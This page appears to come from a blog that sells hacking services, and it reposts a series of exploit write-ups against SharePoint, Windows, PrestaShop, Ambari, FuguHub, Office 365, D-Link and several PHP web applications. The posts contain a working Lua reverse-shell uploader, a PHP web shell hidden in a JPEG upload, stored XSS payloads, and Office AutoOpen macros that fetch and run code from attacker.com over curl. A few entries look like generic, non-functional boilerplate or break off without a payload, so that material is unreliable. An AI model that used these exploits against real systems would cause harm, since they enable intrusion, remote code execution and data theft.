Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863110929

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing
// Date: 2023-06-20
// country: Iran
// Exploit Author: Amirhossein Bahramizadeh
// Category : Remote
// Vendor Homepage:
// Microsoft SharePoint Foundation 2013 Service Pack 1
// Microsoft SharePoint Server Subscription Edition
// Microsoft SharePoint Enterprise Server 2013 Service Pack 1
// Microsoft SharePoint Server 2019
// Microsoft SharePoint Enterprise Server 2016
// Tested on: Windows/Linux
// CVE : CVE-2023-28288

#include <windows.h>
#include <stdio.h>


// The vulnerable SharePoint server URL
const char *server_url = "http://example.com/";

// The URL of the fake SharePoint server
const char *fake_url = "http://attacker.com/";

// The vulnerable SharePoint server file name
const char *file_name = "vuln_file.aspx";

// The fake SharePoint server file name
const char *fake_file_name = "fake_file.aspx";

int main()
{
    HANDLE file;
    DWORD bytes_written;
    char file_contents[1024];

    // Create the fake file contents
    sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>");

    // Write the fake file to disk
    file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (file == INVALID_HANDLE_VALUE)
    {
        printf("Error creating fake file: %d\n", GetLastError());
        return 1;
    }
    if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL))
    {
        printf("Error writing fake file: %d\n", GetLastError());
        CloseHandle(file);
        return 1;
    }
    CloseHandle(file);

    // Send a request to the vulnerable SharePoint server to download the file
    sprintf(file_contents, "%s%s", server_url, file_name);
    file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (file == INVALID_HANDLE_VALUE)
    {
        printf("Error creating vulnerable file: %d\n", GetLastError());
        return 1;
    }
    if (!InternetReadFileUrl(file_contents, file))
    {
        printf("Error downloading vulnerable file: %d\n", GetLastError());
        CloseHandle(file);
        return 1;
    }
    CloseHandle(file);

    // Replace the vulnerable file with the fake file
    if (!DeleteFile(file_name))
    {
        printf("Error deleting vulnerable file: %d\n", GetLastError());
        return 1;
    }
    if (!MoveFile(fake_file_name, file_name))
    {
        printf("Error replacing vulnerable file: %d\n", GetLastError());
        return 1;
    }

    // Send a request to the vulnerable SharePoint server to trigger the vulnerability
    sprintf(file_contents, "%s%s", server_url, file_name);
    if (!InternetReadFileUrl(file_contents, NULL))
    {
        printf("Error triggering vulnerability: %d\n", GetLastError());
        return 1;
    }

    // Print a message indicating that the vulnerability has been exploited
    printf("Vulnerability exploited successfully.\n");

    return 0;
}

BOOL InternetReadFileUrl(const char *url, HANDLE file)
{
    HINTERNET internet, connection, request;
    DWORD bytes_read;
    char buffer[1024];

    // Open an Internet connection
    internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    if (internet == NULL)
    {
        return FALSE;
    }

    // Connect to the server
    connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
    if (connection == NULL)
    {
        InternetCloseHandle(internet);
        return FALSE;
    }

    // Send the HTTP request
    request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);
    if (request == NULL)
    {
        InternetCloseHandle(connection);
        InternetCloseHandle(internet);
        return FALSE;
    }
    if (!HttpSendRequest(request, NULL, 0, NULL, 0))
    {
        InternetCloseHandle(request);
        InternetCloseHandle(connection);
        InternetCloseHandle(internet);
        return FALSE;
    }

    // Read the response data
    while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0)
    {
        if (file != NULL)
        {
            // Write the data to disk
            if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL))
            {
                InternetCloseHandle(request);
                InternetCloseHandle(connection);
                InternetCloseHandle(internet);
                return FALSE;
            }
        }
    }

    InternetCloseHandle(request);
    InternetCloseHandle(connection);
    InternetCloseHandle(internet);
    return TRUE;
}
HireHackking 
// Exploit Title: Windows 11 22h2 - Kernel Privilege Elevation
// Date: 2023-06-20
// country: Iran
// Exploit Author: Amirhossein Bahramizadeh
// Category : webapps
// Vendor Homepage:
// Tested on: Windows/Linux
// CVE : CVE-2023-28293

#include <windows.h>
#include <stdio.h>

// The vulnerable driver file name
const char *driver_name = "vuln_driver.sys";

// The vulnerable driver device name
const char *device_name = "\\\\.\\VulnDriver";

// The IOCTL code to trigger the vulnerability
#define IOCTL_VULN_CODE 0x222003

// The buffer size for the IOCTL input/output data
#define IOCTL_BUFFER_SIZE 0x1000

int main()
{
    HANDLE device;
    DWORD bytes_returned;
    char input_buffer[IOCTL_BUFFER_SIZE];
    char output_buffer[IOCTL_BUFFER_SIZE];

    // Load the vulnerable driver
    if (!LoadDriver(driver_name, "\\Driver\\VulnDriver"))
    {
        printf("Error loading vulnerable driver: %d\n", GetLastError());
        return 1;
    }

    // Open the vulnerable driver device
    device = CreateFile(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (device == INVALID_HANDLE_VALUE)
    {
        printf("Error opening vulnerable driver device: %d\n", GetLastError());
        return 1;
    }

    // Fill the input buffer with data to trigger the vulnerability
    memset(input_buffer, 'A', IOCTL_BUFFER_SIZE);

    // Send the IOCTL to trigger the vulnerability
    if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE, output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL))
    {
        printf("Error sending IOCTL: %d\n", GetLastError());
        return 1;
    }

    // Print the output buffer contents
    printf("Output buffer:\n%s\n", output_buffer);

    // Unload the vulnerable driver
    if (!UnloadDriver("\\Driver\\VulnDriver"))
    {
        printf("Error unloading vulnerable driver: %d\n", GetLastError());
        return 1;
    }

    // Close the vulnerable driver device
    CloseHandle(device);

    return 0;
}

BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name)
{
    SC_HANDLE sc_manager, service;
    DWORD error;

    // Open the Service Control Manager
    sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (sc_manager == NULL)
    {
        return FALSE;
    }

    // Create the service
    service = CreateService(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driver_name, NULL, NULL, NULL, NULL, NULL);
    if (service == NULL)
    {
        error = GetLastError();
        if (error == ERROR_SERVICE_EXISTS)
        {
            // The service already exists, so open it instead
            service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
            if (service == NULL)
            {
                CloseServiceHandle(sc_manager);
                return FALSE;
            }
        }
        else
        {
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }

    // Start the service
    if (!StartService(service, 0, NULL))
    {
        error = GetLastError();
        if (error != ERROR_SERVICE_ALREADY_RUNNING)
        {
            CloseServiceHandle(service);
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }

    CloseServiceHandle(service);
    CloseServiceHandle(sc_manager);
    return TRUE;
}

BOOL UnloadDriver(LPCTSTR service_name)
{
    SC_HANDLE sc_manager, service;
    SERVICE_STATUS status;
    DWORD error;

    // Open the Service Control Manager
    sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (sc_manager == NULL)
    {
        return FALSE;
    }

    // Open the service
    service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
    if (service == NULL)
    {
        CloseServiceHandle(sc_manager);
        return FALSE;
    }

    // Stop the service
    if (!ControlService(service, SERVICE_CONTROL_STOP, &status))
    {
        error = GetLastError();
        if (error != ERROR_SERVICE_NOT_ACTIVE)
        {
            CloseServiceHandle(service);
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }

    // Delete the service
    if (!DeleteService(service))
    {
        CloseServiceHandle(service);
        CloseServiceHandle(sc_manager);
        return FALSE;
    }

    CloseServiceHandle(service);
    CloseServiceHandle(sc_manager);
    return TRUE;
}
HireHackking 
# Exploit Title: MCL-Net 4.3.5.8788 - Information Disclosure
# Date: 5/31/2023
# Exploit Author: Victor A. Morales, GM Sectec Inc.
# Vendor Homepage: https://www.mcl-mobilityplatform.com/net.php
# Version: 4.3.5.8788 (other versions may be affected)
# Tested on: Microsoft Windows 10 Pro
# CVE: CVE-2023-34834

Description:
Directory browsing vulnerability in MCL-Net version 4.3.5.8788 webserver running on default port 5080, allows attackers to gain sensitive information about the configured databases via the "/file" endpoint.

Steps to reproduce:
1. Navigate to the webserver on default port 5080, where "Index of Services" will disclose directories, including the "/file" directory. 
2. Browse to the "/file" directory and database entry folders configured
3. The "AdoInfo.txt" file will contain the database connection strings in plaintext for the configured database. Other files containing database information are also available inside the directory.
HireHackking 
# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
# Date: 2023-06-20
# Dork: /modules/winbizpayment/downloads/download.php
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html
# Version: 17.1.3 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-30198

import requests
import string
import random

# The base URL of the vulnerable site
base_url = "http://example.com"

# The URL of the login page
login_url = base_url + "/authentication.php"

# The username and password for the admin account
username = "admin"
password = "password123"

# The URL of the vulnerable download.php file
download_url = base_url + "/modules/winbizpayment/downloads/download.php"

# The ID of the order to download
order_id = 1234

# The path to save the downloaded file
file_path = "/tmp/order_%d.pdf" % order_id

# The session cookies to use for the requests
session_cookies = None

# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Send a POST request to the login page to authenticate as the admin user
login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}
session = requests.Session()
response = session.post(login_url, data=login_data)

# Save the session cookies for future requests
session_cookies = session.cookies.get_dict()

# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Send a POST request to the download.php file to download the order PDF
download_data = {"id_order": order_id, "csrf_token": csrf_token}
response = session.post(download_url, cookies=session_cookies, data=download_data)

# Save the downloaded file to disk
with open(file_path, "wb") as f:
    f.write(response.content)

# Print a message indicating that the file has been downloaded
print("File downloaded to %s" % file_path)
HireHackking 
# Exploit Title: Azure Apache Ambari 2302250400 - Spoofing
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : Remote
# Vendor Homepage:
Microsoft
Apache Ambari
Microsoft azure Hdinsights
# Tested on: Windows/Linux
# CVE : CVE-2023-23408

import requests

# Set the URL and headers for the Ambari web interface
url = "https://ambari.example.com/api/v1/clusters/cluster_name/services"
headers = {"X-Requested-By": "ambari", "Authorization": "Basic abcdefghijklmnop"}

# Define a function to validate the headers
def validate_headers(headers):
    if "X-Requested-By" not in headers or headers["X-Requested-By"] != "ambari":
        return False
    if "Authorization" not in headers or headers["Authorization"] != "Basic abcdefghijklmnop":
        return False
    return True

# Define a function to send a request to the Ambari web interface
def send_request(url, headers):
    if not validate_headers(headers):
        print("Invalid headers")
        return
    response = requests.get(url, headers=headers)
    if response.status_code == 200:
        print("Request successful")
    else:
        print("Request failed")

# Call the send_request function with the URL and headers
send_request(url, headers)
HireHackking 
Exploit Title: Rukovoditel 3.4.1 - Multiple Stored XSS
Version: 3.4.1
Bugs:  Multiple Stored XSS
Technology: PHP
Vendor URL: https://www.rukovoditel.net/
Software Link: https://www.rukovoditel.net/download.php
Date of found: 24-06-2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
               ###XSS-1###
========================================
steps:
1. login to account
2. create project (http://localhost/index.php?module=items/items&path=21)
3. add task      
4. open task 
5. add comment as "<iframe src="https://14.rs"></iframe> "


POST /index.php?module=items/comments&action=save&token=FEOZ9jeKuA HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 241
Origin: http://localhost
Connection: close
Referer: http://localhost/index.php?module=items/info&path=21-2/22-1&redirect_to=subentity&gotopage[74]=1
Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

form_session_token=FEOZ9jeKuA&path=21-2%2F22-1&fields%5B169%5D=47&fields%5B170%5D=53&fields%5B174%5D=3&description=%3Ciframe+src%3D%22https%3A%2F%2F14.rs%22%3E%3C%2Fiframe%3E+&uploadifive_attachments_upload_attachments=&comments_attachments=

===========================
               ###XSS-2###
===========================
1.go to admin account
2.go to configration => applicaton
3.Copyright Text set as "<img src=x onerror=alert(1)>"


POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------12298384558648010343132232769
Content-Length: 2766
Origin: http://localhost
Connection: close
Referer: http://localhost/index.php?module=configuration/application
Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="form_session_token"

ju271AAoy1
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_NAME]"

Rukovoditel
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SHORT_NAME_MOBILE]"

ffgsdfgsdfg
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]"

ruko
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="APP_LOGO"; filename=""
Content-Type: application/octet-stream


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LOGO]"


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LOGO_URL]"


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="APP_FAVICON"; filename=""
Content-Type: application/octet-stream


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_FAVICON]"


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]"

<img src=x onerror=alert(1)>
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LANGUAGE]"

english.php
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SKIN]"


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_TIMEZONE]"

America/New_York
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]"

10
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]"

m/d/Y
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]"

m/d/Y H:i
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]"

2/./*
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]"

0
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]"

0
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]"

0
-----------------------------12298384558648010343132232769--
HireHackking 
# Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS
# Date: 2023-06-24
# Exploit Author: Furkan Karaarslan
# Category : Webapps
# Vendor Homepage: https://x.com/admin.php?smilies
# Version: 2.2.12 (REQUIRED)
# Tested on: Windows/Linux
# CVE : 

-----------------------------------------------------------------------------
Requests

POST /admin.php?smilie-categories/0/save HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/admin.php?smilies/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422
Content-Length: 1038
Origin: http://127.0.0.1
Connection: close
Cookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQ
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfToken"

1687616851,83fd2350307156281e51b17e20fe575b
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="title"

<img src=x onerror=alert(document.domain)>
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="display_order"

1
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfRequestUri"

/admin.php?smilies/
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfWithData"

1
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfToken"

1687616849,b74724a115448b864ba2db8f89f415f5
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfResponseType"

json
-----------------------------333176689514537912041638543422--


Response: After it is created, an alert comes immediately.
HireHackking 
# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /print.php?nm_member=
# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html
# Tested on: Windows/Linux
# CVE : CVE-2023-36346

import requests
import urllib.parse

# Set the target URL and payload
url = "http://example.com/print.php"
payload = "<script>alert('XSS')</script>"

# Encode the payload for URL inclusion
payload = urllib.parse.quote(payload)

# Build the request parameters
params = {
    "nm_member": payload
}

# Send the request and print the response
response = requests.get(url, params=params)
print(response.text)
HireHackking 
# Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)
# Date: 25-05-2023
# Exploit Author: yuyudhn
# Vendor Homepage: https://www.codekop.com/
# Software Link: https://github.com/fauzan1892/pos-kasir-php
# Version: 2.0
# Tested on: Linux
# CVE: CVE-2023-36348
# Vulnerability description: The application does not sanitize the filename
parameter when sending data to /fungsi/edit/edit.php?gambar=user. An
attacker can exploit this issue by uploading a PHP file and accessing it,
leading to Remote Code Execution.
# Reference: https://yuyudhn.github.io/pos-codekop-vulnerability/

# Proof of Concept:
1. Login to POS Codekop dashboard.
2. Go to profile settings.
3. Upload PHP script through Upload Profile Photo.

Burp Log Example:
```
POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1
Host: localhost
Content-Length: 8934
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
**Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundarymVBHqH4m6KgKBnpa
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-User: ?1**
Sec-Fetch-Dest: document
Referer: http://localhost/research/pos-kasir-php/index.php?page=user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhv
Connection: close

------WebKitFormBoundarymVBHqH4m6KgKBnpa
Content-Disposition: form-data; name="foto"; filename="asuka-rce.php"
Content-Type: image/jpeg

ÿØÿà JFIF HHÿþ6<?php passthru($_GET['cmd']); __halt_compiler(); ?>
ÿÛC

-----------------------------
```
PHP Web Shell location:
http://localhost/research/pos-kasir-php/assets/img/user/[random_number]asuka-rce.php
HireHackking 
# Exploit Title: FuguHub 8.1 - Remote Code Execution
# Date: 6/24/2023
# Exploit Author: redfire359 
# Vendor Homepage: https://fuguhub.com/
# Software Link: https://fuguhub.com/download.lsp
# Version: 8.1
# Tested on: Ubuntu 22.04.1
# CVE : CVE-2023-24078 

import requests
from bs4 import BeautifulSoup
import hashlib
from random import randint
from urllib3 import encode_multipart_formdata
from urllib3.exceptions import InsecureRequestWarning
import argparse
from colorama import Fore
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

#Options for user registration, if no user has been created yet 
username = 'admin'
password = 'password'
email = 'admin@admin.com'

parser = argparse.ArgumentParser()
parser.add_argument("-r","--rhost", help = "Victims ip/url (omit the http://)", required = True)
parser.add_argument("-rp","--rport", help = "http port [Default 80]")
parser.add_argument("-l","--lhost", help = "Your IP", required = True)
parser.add_argument("-p","--lport", help = "Port you have your listener on", required = True)
args = parser.parse_args()

LHOST = args.lhost
LPORT = args.lport
url = args.rhost
if args.rport != None:
    port = args.rport
else:
    port = 80

def main():
    checkAccount()

def checkAccount():
    print(f"{Fore.YELLOW}[*]{Fore.WHITE} Checking for admin user...")
    s = requests.Session()
    
    # Go to the set admin page... if page contains "User database already saved" then there are already admin creds and we will try to login with the creds, otherwise we will manually create an account
    r = s.get(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp") 
    soup = BeautifulSoup(r.content, 'html.parser')
    search = soup.find('h1')
    
    if r.status_code == 404:
        print(Fore.RED + "[!]" + Fore.WHITE +" Page not found! Check the following: \n\tTaget IP\n\tTarget Port")
        exit(0)

    userExists = False
    userText = 'User database already saved'
    for i in search:
        if i.string == userText:
            userExists = True
    
    if userExists:
        print(f"{Fore.GREEN}[+]{Fore.WHITE} An admin user does exist..")
        login(r,s)
    else:
        print("{Fore.GREEN}[+]{Fore.WHITE} No admin user exists yet, creating account with {username}:{password}")
        createUser(r,s)
        login(r,s)

def createUser(r,s):
    data = { email : email , 
            'user' : username , 
            'password' : password , 
            'recoverpassword' : 'on' }
    r = s.post(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp", data = data)
    print(f"{Fore.GREEN}[+]{Fore.WHITE} User Created!")    

def login(r,s):
    print(f"{Fore.GREEN}[+]{Fore.WHITE} Logging in...")

    data = {'ba_username' : username , 'ba_password' : password}
    r = s.post(f"https://{url}:443/rtl/protected/wfslinks.lsp", data = data, verify = False ) # switching to https cause its easier to script lolz  

    #Veryify login 
    login_Success_Title = 'Web-File-Server'
    soup = BeautifulSoup(r.content, 'html.parser')
    search = soup.find('title')
    
    for i in search:
        if i != login_Success_Title:
            print(f"{Fore.RED}[!]{Fore.WHITE} Error! We got sent back to the login page...")
            exit(0)
    print(f"{Fore.GREEN}[+]{Fore.WHITE} Success! Finding a valid file server link...")

    exploit(r,s)

def exploit(r,s):
    #Find the file server, default is fs
    r = s.get(f"https://{url}:443/fs/cmsdocs/")
    
    code = r.status_code

    if code == 404:
        print(f"{Fore.RED}[!]{Fore.WHITE} File server not found. ")
        exit(0)

    print(f"{Fore.GREEN}[+]{Fore.WHITE} Code: {code}, found valid file server, uploading rev shell")
    
    #Change the shell if you want to, when tested I've had the best luck with lua rev shell code so thats what I put as default 
    shell = f'local host, port = "{LHOST}", {LPORT} \nlocal socket = require("socket")\nlocal tcp = socket.tcp() \nlocal io = require("io") tcp:connect(host, port); \n while 						true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

    
    file_content = f'''
	<h2> Check ur nc listener on the port you put in <h2>

	<?lsp if request:method() == "GET" then ?>
		<?lsp 
        {shell}		
		?>
	<?lsp else ?>
		Wrong request method, goodBye! 
	<?lsp end ?>
	'''

    files = {'file': ('rev.lsp', file_content, 'application/octet-stream')}
    r = s.post(f"https://{url}:443/fs/cmsdocs/", files=files)
    
    if r.text == 'ok' :
        print(f"{Fore.GREEN}[+]{Fore.WHITE} Successfully uploaded, calling shell ")
        r = s.get(f"https://{url}:443/rev.lsp")

if __name__=='__main__':
    try:
        main()
    except:
        print(f"\n{Fore.YELLOW}[*]{Fore.WHITE} Good bye!\n\n**All Hail w4rf4ther!")
HireHackking 
Exploit Title: WebsiteBaker v2.13.3 - Stored XSS
Application: WebsiteBaker
Version: 2.13.3
Bugs:  Stored XSS
Technology: PHP
Vendor URL: https://websitebaker.org/pages/en/home.php
Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
Date of found: 26.06.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 

1. login to account
2. go to media
3. upload svg file

"""
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>
"""
4. go to svg file (http://localhost/media/malas.svg)
HireHackking 
## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 04.17.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/
## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-2023-28285


## Description:
The attack itself is carried out locally by a user with authentication
to the targeted system. An attacker could exploit the vulnerability by
convincing a victim, through social engineering, to download and open
a specially crafted file from a website which could lead to a local
attack on the victim's computer. The attacker can trick the victim to
open a malicious web page by using a malicious `Word` file for
`Office-365 API`. After the user will open the file to read it, from
the API of Office-365, without being asked what it wants to activate,
etc, he will activate the code of the malicious server, which he will
inject himself, from this malicious server. Emedietly after this
click, the attacker can receive very sensitive information! For bank
accounts, logs from some sniff attacks, tracking of all the traffic of
the victim without stopping, and more malicious stuff, it depends on
the scenario and etc.
STATUS: HIGH Vulnerability

[+]Exploit:
The exploit server must be BROADCASTING at the moment when the victim
hit the button of the exploit!

[+]PoC:
```cmd
Sub AutoOpen()
    Call Shell("cmd.exe /S /c" & "curl -s
http://attacker.com/CVE-2023-28285/PoC.debelui | debelui",
vbNormalFocus)
End Sub
```

## FYI:
The PoC has a price and this report will be uploaded with a
description and video of how you can reproduce it only.

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28285)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html)

## Time spend:
01:30:00
HireHackking 
## Title:Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 06.27.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/excel
## Reference: https://portswigger.net/daily-swig/rce
## CVE-2023-33137


## Description:
This exploit is connected with third part exploit server, which waits
for the victim to call him and execute the content from him using the
pipe posting method! This is absolutely a 0-day exploit! This is
absolutely dangerous for the victims, who are infected by him!
When the victim hit the button in the Excel file, it makes a POST
request to the exploit server, and the server is responding back that
way: He creates another hidden malicious file and executed it directly
on the machine of the victim, then everything is disappeared, so
nasty.

STATUS: HIGH Vulnerability WARNING: THIS IS VERY DANGER for the usual users!

[+]Exploit:
```vbs
Sub AutoOpen()
  Call Shell("cmd.exe /S /c" & "curl -s
https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat
> maloumnici.bat && .\maloumnici.bat", vbNormalFocus)
End Sub

```

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33137)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/microsoft-excel-microsoft-365-mso.html)

## Time spend:
01:27:00
HireHackking 
# Exploit Title: D-Link DAP-1325 - Broken Access Control
# Date: 27-06-2023
# Exploit Author: ieduardogoncalves
# Contact : twitter.com/0x00dia
# Vendor : www.dlink.com
# Version: Hardware version: A1 
# Firmware version: 1.01
# Tested on:All Platforms


1) Description

Security vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.


IN MY CASE,
Tested repeater IP: http://192.168.0.21/

Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0

2) Proof of Concept

Step 1: Go to
Repeater Login Page : http://192.168.0.21/

Step 2:
Add the payload to URL.

Payload:
